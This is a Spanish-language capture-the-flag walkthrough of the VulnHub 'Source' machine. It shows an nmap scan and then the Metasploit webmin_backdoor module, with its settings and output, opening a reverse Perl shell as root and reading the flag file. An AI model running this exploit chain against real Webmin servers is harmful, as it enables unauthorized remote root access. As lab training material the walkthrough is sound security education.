Hoy vamos a hackear la maquina de Vulnhub llamada
Source. Podeis descargarla desde el siguiente enlace:
https://www.vulnhub.com/entry/source-1,514/
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
sml@m0nique:~$ nmap -A -p- 192.168.112.143
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 13:13 CEST
Nmap scan report for 192.168.112.143
Host is up (0.0013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol
2.0)
| ssh-hostkey:
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.45 seconds
Podemos ver que tiene MiniServ con la version 1.890, la cual
tiene una backdoor si es de sourceforge.
Exploitation
Arrancamos metasploit.
msfconsole
Usaremos el modulo "exploit/linux/http/webmin_backdoor".
msf5 > use exploit/linux/http/webmin_backdoor
msf5 exploit(linux/http/webmin_backdoor) > show options
Module options (exploit/linux/http/webmin_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format
type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR
identifier, or hosts file with syntax 'file:'
RPORT 10000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to
listen on. This must be an address on the local machine or 0.0.0.0 to listen on
all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing
connections
SSLCert no Path to a custom SSL certificate
(default is randomly generated)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit
(default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be
specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
Hacemos el "set" de los valores.
msf5 exploit(linux/http/webmin_backdoor) > set lhost 192.168.112.128
msf5 exploit(linux/http/webmin_backdoor) > set rhosts 192.168.112.143
msf5 exploit(linux/http/webmin_backdoor) > set ssl true
Y por ultimo, lanzamos el exploit!
msf5 exploit(linux/http/webmin_backdoor) > exploit
[*] Started reverse TCP handler on 192.168.112.128:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.112.128:4444 ->
192.168.112.143:49484) at 2020-07-31 13:38:38 +0200
id
uid=0(root) gid=0(root) groups=0(root)
root.txt
cd /root
ls /root
root.txt
cat /root/root.txt
THM{UPDATE_YOUR_INSTALL}
